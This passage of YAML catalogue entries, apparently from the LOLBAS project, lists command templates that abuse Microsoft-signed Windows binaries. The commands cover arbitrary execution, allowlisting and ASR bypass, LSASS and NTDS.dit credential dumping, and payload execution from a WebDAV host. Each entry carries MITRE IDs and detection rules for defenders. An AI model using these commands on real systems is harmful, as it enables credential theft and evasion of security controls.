T1003.001 OperatingSystem: All Windows - Command: adplus.exe -c {PATH:.xml} Description: Execute arbitrary commands using adplus config file (see Resources section for a sample file). Usecase: Run commands under a trusted Microsoft signed binary Category: Execute Privileges: User MitreID: T1127 OperatingSystem: All Windows Tags: - Execute: CMD - Command: adplus.exe -c {PATH:.xml} Description: Dump process memory using adplus config file (see Resources section for a sample file). Usecase: Run commands under a trusted Microsoft signed binary Category: Dump Privileges: SYSTEM MitreID: T1003.001 OperatingSystem: All Windows - Command: adplus.exe -crash -o "{PATH_ABSOLUTE:folder}" -sc {PATH:.exe} Description: Execute arbitrary commands and binaries from the context of adplus. Note that providing an output directory via '-o' is required. Usecase: Run commands under a trusted Microsoft signed binary Category: Execute Privileges: User MitreID: T1127 OperatingSystem: All windows Tags: - Execute: CMD - Execute: EXE Full_Path: - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\adplus.exe - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\adplus.exe Code_Sample: - Code: https://gist.github.com/nasbench/e34ca2cd90e3a845a558a102a4f607da Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_adplus.yml - IOC: As a Windows SDK binary, execution on a system may be suspicious Resources: - Link: https://mrd0x.com/adplus-debugging-tool-lsass-dump/ - Link: https://twitter.com/nas_bench/status/1534916659676422152 - Link: https://twitter.com/nas_bench/status/1534915321856917506 Acknowledgement: - Person: mr.d0x Handle: '@mrd0x' - Person: Nasreddine Bencherchali Handle: '@nas_bench' ================================================ FILE: yml/OtherMSBinaries/Agentexecutor.yml ================================================ --- Name: AgentExecutor.exe Description: Intune 
Management Extension included on Intune Managed Devices Author: Eleftherios Panos Created: 2020-07-23 Commands: - Command: AgentExecutor.exe -powershell "{PATH_ABSOLUTE:.ps1}" "{PATH_ABSOLUTE:.1.log}" "{PATH_ABSOLUTE:.2.log}" "{PATH_ABSOLUTE:.3.log}" 60000 "C:\Windows\SysWOW64\WindowsPowerShell\v1.0" 0 1 Description: Spawns powershell.exe and executes a provided powershell script with ExecutionPolicy Bypass argument Usecase: Execute unsigned powershell scripts Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows 10 Tags: - Execute: PowerShell - Command: AgentExecutor.exe -powershell "{PATH_ABSOLUTE:.ps1}" "{PATH_ABSOLUTE:.1.log}" "{PATH_ABSOLUTE:.2.log}" "{PATH_ABSOLUTE:.3.log}" 60000 "{PATH_ABSOLUTE:folder}" 0 1 Description: If we place a binary named powershell.exe in the specified folder path, agentexecutor.exe will execute it successfully Usecase: Execute a provided EXE Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows 10 Tags: - Execute: EXE Full_Path: - Path: C:\Program Files (x86)\Microsoft Intune Management Extension\AgentExecutor.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_agentexecutor.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_agentexecutor_susp_usage.yml Acknowledgement: - Person: Eleftherios Panos Handle: '@lefterispan' ================================================ FILE: yml/OtherMSBinaries/AppLauncher.yml ================================================ --- Name: AppLauncher.exe Description: User Experience Virtualization tool that launches applications under monitoring to capture and synchronize user settings. Author: Avihay Eldad Created: 2025-09-21 Commands: - Command: AppLauncher.exe {PATH_ABSOLUTE:.exe} Description: Launches an executable via User Experience Virtualization tool. 
Usecase: Executes an executable under a trusted, Microsoft signed binary. Category: Execute Privileges: User MitreID: T1127 OperatingSystem: Windows Tags: - Execute: EXE Full_Path: - Path: C:\Program Files\Windows Kits\10\Microsoft User Experience Virtualization\Management\AppLauncher.exe - Path: C:\Program Files (x86)\Windows Kits\10\Microsoft User Experience Virtualization\Management\AppLauncher.exe Resources: - Link: https://learn.microsoft.com/en-us/microsoft-desktop-optimization-pack/ue-v/uev-getting-started Acknowledgement: - Person: Avihay Eldad Handle: '@AvihayEldad' ================================================ FILE: yml/OtherMSBinaries/Appcert.yml ================================================ --- Name: AppCert.exe Description: Windows App Certification Kit command-line tool. Author: Avihay Eldad Created: 2024-03-06 Commands: - Command: appcert.exe test -apptype desktop -setuppath {PATH_ABSOLUTE:.exe} -reportoutputpath {PATH_ABSOLUTE:.xml} Description: Execute an executable file via the Windows App Certification Kit command-line tool. Usecase: Performs execution of specified file, can be used as a defense evasion Category: Execute Privileges: Administrator MitreID: T1127 OperatingSystem: Windows Tags: - Execute: EXE - Command: appcert.exe test -apptype desktop -setuppath {PATH_ABSOLUTE:.msi} -setupcommandline /q -reportoutputpath {PATH_ABSOLUTE:.xml} Description: Install an MSI file via an msiexec instance spawned via appcert.exe as parent process. 
Usecase: Execute custom made MSI file with malicious code Category: Execute Privileges: Administrator MitreID: T1218.007 OperatingSystem: Windows Tags: - Execute: MSI Full_Path: - Path: C:\Program Files (x86)\Windows Kits\10\App Certification Kit\appcert.exe - Path: C:\Program Files\Windows Kits\10\App Certification Kit\appcert.exe Resources: - Link: https://learn.microsoft.com/windows/win32/win_cert/using-the-windows-app-certification-kit Acknowledgement: - Person: Avihay Eldad Handle: '@AvihayEldad' ================================================ FILE: yml/OtherMSBinaries/Appvlp.yml ================================================ --- Name: Appvlp.exe Description: Application Virtualization Utility Included with Microsoft Office 2016 Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: AppVLP.exe {PATH_SMB:.bat} Usecase: Execution of BAT file hosted on Webdav server. Description: Executes .bat file through AppVLP.exe Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows 10 w/Office 2016 Tags: - Execute: CMD - Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('{PATH:.exe}','', '', 'open', 1)" Usecase: Local execution of process bypassing Attack Surface Reduction (ASR). Description: Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command. 
    Category: Execute
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows 10 w/Office 2016
    Tags:
      - Execute: EXE
Full_Path:
  - Path: C:\Program Files\Microsoft Office\root\client\appvlp.exe
  - Path: C:\Program Files (x86)\Microsoft Office\root\client\appvlp.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_appvlp.yml
Resources:
  - Link: https://github.com/MoooKitty/Code-Execution
  - Link: https://twitter.com/moo_hax/status/892388990686347264
  - Link: https://enigma0x3.net/2018/06/11/the-tale-of-settingcontent-ms-files/
  - Link: https://securityboulevard.com/2018/07/attackers-test-new-document-attack-vector-that-slips-past-office-defenses/
Acknowledgement:
  - Person: fab
    Handle: '@0rbz_'
  - Person: Will
    Handle: '@moo_hax'
  - Person: Matt Nelson
    Handle: '@enigma0x3'

================================================
FILE: yml/OtherMSBinaries/Bcp.yml
================================================
---
Name: Bcp.exe
Description: Microsoft SQL Server Bulk Copy Program utility for importing and exporting data between SQL Server instances and data files.
Author: Mahir Ali Khan
Created: 2025-11-13
Commands:
  - Command: bcp "SELECT payload_data FROM database.dbo.payloads WHERE id=1" queryout "C:\Windows\Temp\payload.exe" -S localhost -T -c
    Description: Export a binary payload stored in a SQL Server database to the file system.
    Usecase: Extract a malicious executable from database storage to the local file system for execution.
    Category: Download
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows
Full_Path:
  - Path: C:\Program Files\Microsoft SQL Server\Client SDK\ODBC\170\Tools\Binn\bcp.exe
  - Path: C:\Program Files\Microsoft SQL Server\Client SDK\ODBC\130\Tools\Binn\bcp.exe
  - Path: C:\Program Files\Microsoft SQL Server\Client SDK\ODBC\110\Tools\Binn\bcp.exe
  - Path: C:\Program Files (x86)\Microsoft SQL Server\Client SDK\ODBC\170\Tools\Binn\bcp.exe
  - Path: C:\Program Files (x86)\Microsoft SQL Server\Client SDK\ODBC\130\Tools\Binn\bcp.exe
  - Path: C:\Program Files (x86)\Microsoft SQL Server\Client SDK\ODBC\110\Tools\Binn\bcp.exe
  - Path: C:\Program Files (x86)\Microsoft SQL Server\120\Tools\Binn\bcp.exe
Detection:
  - IOC: Process creation of bcp.exe with the queryout or out parameter
  - IOC: bcp.exe writing executable files to temp or user directories
  - IOC: Network connections from bcp.exe to SQL Server followed by file creation
  - IOC: Event ID 4688 - Process creation for bcp.exe
  - IOC: Event ID 4663 - File system access by bcp.exe
  - Sigma: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_bcp_export_data.yml
Resources:
  - Link: https://docs.microsoft.com/en-us/sql/tools/bcp-utility
  - Link: https://asec.ahnlab.com/en/61000/
  - Link: https://asec.ahnlab.com/en/78944/
  - Link: https://www.huntress.com/blog/attacking-mssql-servers
  - Link: https://www.huntress.com/blog/attacking-mssql-servers-pt-ii
  - Link: https://news.sophos.com/en-us/2024/08/07/sophos-mdr-hunt-tracks-mimic-ransomware-campaign-against-organizations-in-india/
  - Link: https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/
Acknowledgement:
  - Person: Mahir Ali Khan
    Handle: '@mahiralikhan07'

================================================
FILE: yml/OtherMSBinaries/Bginfo.yml
================================================
---
Name: Bginfo.exe
Description: Background Information utility included with the Sysinternals Suite.
Author: Oddvar Moe
Created: 2018-05-25
Commands:
  - Command: bginfo.exe {PATH:.bgi} /popup /nolicprompt
    Description: Execute VBScript code that is referenced within the specified .bgi file.
    Usecase: Local execution of VBScript
    Category: Execute
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows
    Tags:
      - Execute: WSH
  - Command: bginfo.exe {PATH:.bgi} /popup /nolicprompt
    Description: Execute VBScript code that is referenced within the specified .bgi file.
    Usecase: Local execution of VBScript
    Category: AWL Bypass
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows
    Tags:
      - Execute: WSH
  - Command: \\10.10.10.10\webdav\bginfo.exe {PATH:.bgi} /popup /nolicprompt
    Usecase: Remote execution of VBScript
    Description: Execute bginfo.exe from a WebDAV server.
    Category: Execute
    Privileges: User
    MitreID: T1218
    Tags:
      - Execute: WSH
    OperatingSystem: Windows
  - Command: \\10.10.10.10\webdav\bginfo.exe {PATH:.bgi} /popup /nolicprompt
    Usecase: Remote execution of VBScript
    Description: Execute bginfo.exe from a WebDAV server.
    Category: AWL Bypass
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows
    Tags:
      - Execute: WSH
  - Command: \\live.sysinternals.com\Tools\bginfo.exe {PATH_SMB:.bgi} /popup /nolicprompt
    Usecase: Remote execution of VBScript
    Description: This style of execution may no longer work due to a patch.
    Category: Execute
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows
    Tags:
      - Execute: WSH
      - Execute: Remote
  - Command: \\live.sysinternals.com\Tools\bginfo.exe {PATH_SMB:.bgi} /popup /nolicprompt
    Usecase: Remote execution of VBScript
    Description: This style of execution may no longer work due to a patch.
    Category: AWL Bypass
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows
    Tags:
      - Execute: WSH
      - Execute: Remote
Full_Path:
  - Path: no default
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_bginfo.yml
  - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml
  - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml
  - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
Resources:
  - Link: https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/
Acknowledgement:
  - Person: Oddvar Moe
    Handle: '@oddvarmoe'

================================================
FILE: yml/OtherMSBinaries/Cdb.yml
================================================
---
Name: Cdb.exe
Description: Debugging tool included with the Windows Debugging Tools.
Author: Oddvar Moe
Created: 2018-05-25
Commands:
  - Command: cdb.exe -cf {PATH:.wds} -o notepad.exe
    Description: Launch 64-bit shellcode from the specified .wds file using cdb.exe.
    Usecase: Local execution of assembly shellcode.
    Category: Execute
    Privileges: User
    MitreID: T1127
    OperatingSystem: Windows
    Tags:
      - Execute: Shellcode
  - Command: |
      cdb.exe -pd -pn {process_name}
      .shell {CMD}
    Description: Attach to any process and execute shell commands from the debugger prompt.
    Usecase: Run a shell command under a trusted Microsoft-signed binary
    Category: Execute
    Privileges: User
    MitreID: T1127
    OperatingSystem: Windows
    Tags:
      - Execute: CMD
  - Command: cdb.exe -c {PATH:.txt} "{CMD}"
    Description: Execute arbitrary commands and binaries using a debugging script (see the Resources section for a sample file).
    Usecase: Run commands under a trusted Microsoft-signed binary
    Category: Execute
    Privileges: User
    MitreID: T1127
    OperatingSystem: Windows
    Tags:
      - Execute: CMD
Full_Path:
  - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe
  - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\cdb.exe
Code_Sample:
  - Code: https://gist.github.com/nasbench/d9c15864f1e21bdd8b7cf55997b45f4b
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_cdb.yml
  - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml
  - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml
  - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
Resources:
  - Link: http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html
  - Link: https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options
  - Link: https://gist.github.com/mattifestation/94e2b0a9e3fe1ac0a433b5c3e6bd0bda
  - Link: https://mrd0x.com/the-power-of-cdb-debugging-tool/
  - Link: https://twitter.com/nas_bench/status/1534957360032120833
Acknowledgement:
  - Person: Matt Graeber
    Handle: '@mattifestation'
  - Person: mr.d0x
    Handle: '@mrd0x'
  - Person: Spooky Sec
    Handle: '@sec_spooky'
  - Person: Nasreddine Bencherchali
    Handle: '@nas_bench'

================================================
FILE: yml/OtherMSBinaries/Coregen.yml
================================================
---
Name: coregen.exe
Description: |
  Binary coregen.exe (Microsoft CoreCLR Native Image Generator) loads the exported function GetCLRRuntimeHost from coreclr.dll or from a .DLL in an arbitrary path.
  Coregen is located within "C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\" or another version of Silverlight. Coregen is signed by Microsoft and bundled with Microsoft Silverlight.
Author: Martin Sohn Christensen
Created: 2020-10-09
Commands:
  - Command: coregen.exe /L {PATH_ABSOLUTE:.dll} dummy_assembly_name
    Description: Loads the target .DLL from the arbitrary path specified with /L.
    Usecase: Execute DLL code
    Category: Execute
    Privileges: User
    MitreID: T1055
    OperatingSystem: Windows
    Tags:
      - Execute: DLL
  - Command: coregen.exe dummy_assembly_name
    Description: Loads the coreclr.dll found in the coregen.exe directory (e.g. C:\Program Files\Microsoft Silverlight\5.1.50918.0).
    Usecase: Execute DLL code
    Category: Execute
    Privileges: User
    MitreID: T1055
    OperatingSystem: Windows
    Tags:
      - Execute: DLL
  - Command: coregen.exe /L {PATH_ABSOLUTE:.dll} dummy_assembly_name
    Description: Loads the target .DLL from the arbitrary path specified with /L. Since the binary is signed, it can also be used to bypass application whitelisting solutions.
    Usecase: Execute DLL code
    Category: AWL Bypass
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows
    Tags:
      - Execute: DLL
Full_Path:
  - Path: C:\Program Files\Microsoft Silverlight\5.1.50918.0\coregen.exe
  - Path: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\coregen.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/image_load/image_load_side_load_coregen.yml
  - IOC: coregen.exe loading a .dll file that is not in "C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\"
  - IOC: coregen.exe loading a .dll file not named coreclr.dll
  - IOC: coregen.exe command line containing /L (or -L, -l)
  - IOC: coregen.exe command line containing an unexpected/invalid assembly name
  - IOC: coregen.exe application crash caused by an invalid assembly name
Resources:
  - Link: https://www.youtube.com/watch?v=75XImxOOInU
  - Link: https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html
Acknowledgement:
  - Person: Nicky Tyrer
  - Person: Evan Pena
  - Person: Casey Erikson

================================================
FILE: yml/OtherMSBinaries/Createdump.yml
================================================
---
Name: Createdump.exe
Description: Microsoft .NET Runtime Crash Dump Generator (included in .NET Core)
Author: mr.d0x, Daniel Santos
Created: 2022-01-20
Commands:
  - Command: createdump.exe -n -f {PATH:.dmp} {PID}
    Description: Dump a process by PID and create a minidump file. If "-f dump.dmp" is not specified, the file is created as '%TEMP%\dump.%p.dmp', where %p is the PID of the target process.
    Usecase: Dump process memory contents using the PID.
    Category: Dump
    Privileges: SYSTEM
    MitreID: T1003
    OperatingSystem: Windows 10, Windows 11
Full_Path:
  - Path: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\\createdump.exe
  - Path: C:\Program Files (x86)\dotnet\shared\Microsoft.NETCore.App\\createdump.exe
  - Path: C:\Program Files\Microsoft Visual Studio\\Community\dotnet\runtime\shared\Microsoft.NETCore.App\6.0.0\createdump.exe
  - Path: C:\Program Files (x86)\Microsoft Visual Studio\\Community\dotnet\runtime\shared\Microsoft.NETCore.App\6.0.0\createdump.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_proc_dump_createdump.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_renamed_createdump.yml
  - IOC: createdump.exe process with a command line containing the lsass.exe process ID
Resources:
  - Link: https://twitter.com/bopin2020/status/1366400799199272960
  - Link: https://docs.microsoft.com/en-us/troubleshoot/developer/webapps/aspnetcore/practice-troubleshoot-linux/lab-1-3-capture-core-crash-dumps
Acknowledgement:
  - Person: bopin
    Handle: '@bopin2020'

================================================
FILE: yml/OtherMSBinaries/Csi.yml
================================================
---
Name: csi.exe
Description: C# Interactive command-line interface (Roslyn scripting host) included with Visual Studio.
Author: Oddvar Moe
Created: 2018-05-25
Commands:
  - Command: csi.exe {PATH:.cs}
    Description: Use csi.exe to run unsigned C# code.
    Usecase: Local execution of unsigned C# code.
    Category: Execute
    Privileges: User
    MitreID: T1127
    OperatingSystem: Windows
    Tags:
      - Execute: CSharp
Full_Path:
  - Path: c:\Program Files (x86)\Microsoft Visual Studio\2017\Community\MSBuild\15.0\Bin\Roslyn\csi.exe
  - Path: c:\Program Files (x86)\Microsoft Web Tools\Packages\Microsoft.Net.Compilers.X.Y.Z\tools\csi.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_csi_execution.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_csi_use_of_csharp_console.yml
  - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml
  - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml
  - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
Resources:
  - Link: https://twitter.com/subTee/status/781208810723549188
  - Link: https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/
Acknowledgement:
  - Person: Casey Smith
    Handle: '@subtee'

================================================
FILE: yml/OtherMSBinaries/DefaultPack.yml
================================================
---
Name: DefaultPack.EXE
Description: This binary can be downloaded alongside multiple software downloads on the Microsoft website. It gets downloaded when the user forgets to uncheck the option to set Bing as the default search provider.
Author: '@checkymander'
Created: 2020-10-01
Commands:
  - Command: DefaultPack.EXE /C:"{CMD}"
    Description: Use DefaultPack.EXE to execute arbitrary binaries, with added argument support.
    Usecase: Can be used to execute stagers, binaries, and other malicious commands.
    Category: Execute
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows
    Tags:
      - Execute: CMD
Full_Path:
  - Path: C:\Program Files (x86)\Microsoft\DefaultPack\DefaultPack.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_lolbin_defaultpack.yml
  - IOC: DefaultPack.EXE spawned an unknown process
Resources:
  - Link: https://twitter.com/checkymander/status/1311509470275604480
Acknowledgement:
  - Person: checkymander
    Handle: '@checkymander'

================================================
FILE: yml/OtherMSBinaries/Devinit.yml
================================================
---
Name: Devinit.exe
Description: Visual Studio 2019 tool
Author: mr.d0x
Created: 2022-01-20
Commands:
  - Command: devinit.exe run -t msi-install -i {REMOTEURL:.msi}
    Description: Downloads an MSI file to C:\Windows\Installer and then installs it.
    Usecase: Executes code from a (remote) MSI file.
    Category: Execute
    Privileges: User
    MitreID: T1218.007
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Execute: MSI
      - Execute: Remote
Full_Path:
  - Path: C:\Program Files\Microsoft Visual Studio\\Community\Common7\Tools\devinit\devinit.exe
  - Path: C:\Program Files (x86)\Microsoft Visual Studio\\Community\Common7\Tools\devinit\devinit.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_devinit_lolbin_usage.yml
Resources:
  - Link: https://twitter.com/mrd0x/status/1460815932402679809
Acknowledgement:
  - Person: mr.d0x
    Handle: '@mrd0x'

================================================
FILE: yml/OtherMSBinaries/Devtoolslauncher.yml
================================================
---
Name: Devtoolslauncher.exe
Description: Launches a specified binary. Part of the VS/VS Code installation.
Author: felamos
Created: 2019-10-04
Commands:
  - Command: devtoolslauncher.exe LaunchForDeploy {PATH_ABSOLUTE:.exe} "{CMD:args}" test
    Description: Executes the specified binary with the given arguments.
    Usecase: Execute any binary with the given arguments; devtoolslauncher.exe hands the request to `developertoolssvc.exe`, which is the process that actually executes the binary.
    Category: Execute
    Privileges: User
    MitreID: T1127
    OperatingSystem: Windows
    Tags:
      - Execute: CMD
  - Command: devtoolslauncher.exe LaunchForDebug {PATH_ABSOLUTE:.exe} "{CMD:args}" test
    Description: Executes the specified binary with the given arguments.
    Usecase: Execute any binary with the given arguments.
    Category: Execute
    Privileges: User
    MitreID: T1127
    OperatingSystem: Windows
    Tags:
      - Execute: CMD
Full_Path:
  - Path: 'c:\windows\system32\devtoolslauncher.exe'
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_devtoolslauncher.yml
  - IOC: DeveloperToolsSvc.exe spawned an unknown process
Resources:
  - Link: https://twitter.com/_felamos/status/1179811992841797632
  - Link: https://www.virustotal.com/gui/file/84877a507af8b70c145777a87eaf28a8327c50a1563fe650f34572bef8a42ff6/details
Acknowledgement:
  - Person: felamos
    Handle: '@_felamos'

================================================
FILE: yml/OtherMSBinaries/Dnx.yml
================================================
---
Name: dnx.exe
Description: .NET Execution Environment (DNX) host included with early .NET Core tooling.
Author: Oddvar Moe
Created: 2018-05-25
Commands:
  - Command: dnx.exe {PATH_ABSOLUTE:folder}
    Description: Execute C# code located in the specified folder via 'Program.cs' and 'Project.json' (note: requires the project's dependencies to be present).
    Usecase: Local execution of a C# project stored in a consoleapp folder.
    Category: Execute
    Privileges: User
    MitreID: T1127
    OperatingSystem: Windows
    Tags:
      - Execute: CSharp
Full_Path:
  - Path: no default
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_dnx.yml
  - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml
  - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml
  - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
Resources:
  - Link: https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/
Acknowledgement:
  - Person: Matt Nelson
    Handle: '@enigma0x3'

================================================
FILE: yml/OtherMSBinaries/Dotnet.yml
================================================
---
Name: Dotnet.exe
Description: dotnet.exe is the command-line host that ships with .NET Core (now .NET) runtimes and SDKs.
Author: felamos
Created: 2019-11-12
Commands:
  - Command: dotnet.exe {PATH:.dll}
    Description: dotnet.exe will execute any .NET DLL even if AppLocker is enabled.
    Usecase: Execute code bypassing AWL
    Category: AWL Bypass
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows 7 and up with .NET installed
    Tags:
      - Execute: DLL (.NET)
  - Command: dotnet.exe {PATH:.dll}
    Description: dotnet.exe will execute any .NET DLL.
    Usecase: Execute DLL
    Category: Execute
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows 7 and up with .NET installed
    Tags:
      - Execute: DLL (.NET)
  - Command: dotnet.exe fsi
    Description: dotnet.exe will open a console which allows the execution of arbitrary F# commands.
    Usecase: Execute arbitrary F# code
    Category: Execute
    Privileges: User
    MitreID: T1059
    OperatingSystem: Windows 10 and up with .NET SDK installed
    Tags:
      - Execute: FSharp
  - Command: dotnet.exe msbuild {PATH:.csproj}
    Description: dotnet.exe with msbuild (SDK version) will execute unsigned code.
    Usecase: Execute code bypassing AWL
    Category: AWL Bypass
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows 10 and up with .NET Core installed
    Tags:
      - Execute: CSharp
Full_Path:
  - Path: 'C:\Program Files\dotnet\dotnet.exe'
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_dotnet.yml
  - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
  - IOC: dotnet.exe spawned an unknown process
Resources:
  - Link: https://twitter.com/_felamos/status/1204705548668555264
  - Link: https://gist.github.com/bohops/3f645a7238d8022830ecf5511b3ecfbc
  - Link: https://bohops.com/2019/08/19/dotnet-core-a-vector-for-awl-bypass-defense-evasion/
  - Link: https://learn.microsoft.com/en-us/dotnet/fsharp/tools/fsharp-interactive/
Acknowledgement:
  - Person: felamos
    Handle: '@_felamos'
  - Person: Jimmy
    Handle: '@bohops'
  - Person: yamalon
    Handle: '@mavinject'

================================================
FILE: yml/OtherMSBinaries/Dsdbutil.yml
================================================
---
Name: dsdbutil.exe
Description: Dsdbutil is a command-line tool that is built into Windows Server. It is available if you have the AD LDS server role installed. It can be used as a command-line utility to export Active Directory.
Aliases:
  - Alias: dsDbUtil.exe # PE OriginalFileName
Author: Ekitji
Created: 2023-05-31
Commands:
  - Command: dsdbutil.exe "activate instance ntds" "snapshot" "create" "quit" "quit"
    Description: dsdbutil supports VSS snapshot creation
    Usecase: Snapshotting the Active Directory NTDS.dit database
    Category: Dump
    Privileges: Administrator
    MitreID: T1003.003
    OperatingSystem: Windows Server 2012, Windows Server 2016, Windows Server 2019
  - Command: dsdbutil.exe "activate instance ntds" "snapshot" "mount {GUID}" "quit" "quit"
    Description: Mount the snapshot by its GUID
    Usecase: Mounting the snapshot to access ntds.dit, e.g. with `copy c:\\windows\ntds\ntds.dit c:\users\administrator\desktop\ntds.dit.bak`
    Category: Dump
    Privileges: Administrator
    MitreID: T1003.003
    OperatingSystem: Windows Server 2012, Windows Server 2016, Windows Server 2019
  - Command: dsdbutil.exe "activate instance ntds" "snapshot" "delete {GUID}" "quit" "quit"
    Description: Deletes the snapshot (and its mount) by GUID
    Usecase: Deletes the snapshot
    Category: Dump
    Privileges: Administrator
    MitreID: T1003.003
    OperatingSystem: Windows Server 2012, Windows Server 2016, Windows Server 2019
  - Command: dsdbutil.exe "activate instance ntds" "snapshot" "create" "list all" "mount 1" "quit" "quit"
    Description: Mount the snapshot by its index in the snapshot list
    Usecase: Mounting snapshot number 1 and accessing it with `copy c:\\windows\ntds\ntds.dit c:\users\administrator\desktop\ntds.dit.bak`
    Category: Dump
    Privileges: Administrator
    MitreID: T1003.003
    OperatingSystem: Windows Server 2012, Windows Server 2016, Windows Server 2019
  - Command: dsdbutil.exe "activate instance ntds" "snapshot" "list all" "delete 1" "quit" "quit"
    Description: Deletes the snapshot (and its mount) by index
    Usecase: Deletes the snapshot
    Category: Dump
    Privileges: Administrator
    MitreID: T1003.003
    OperatingSystem: Windows Server 2012, Windows Server 2016, Windows Server 2019
Full_Path:
  - Path: C:\Windows\System32\dsdbutil.exe
  - Path: C:\Windows\SysWOW64\dsdbutil.exe
Detection:
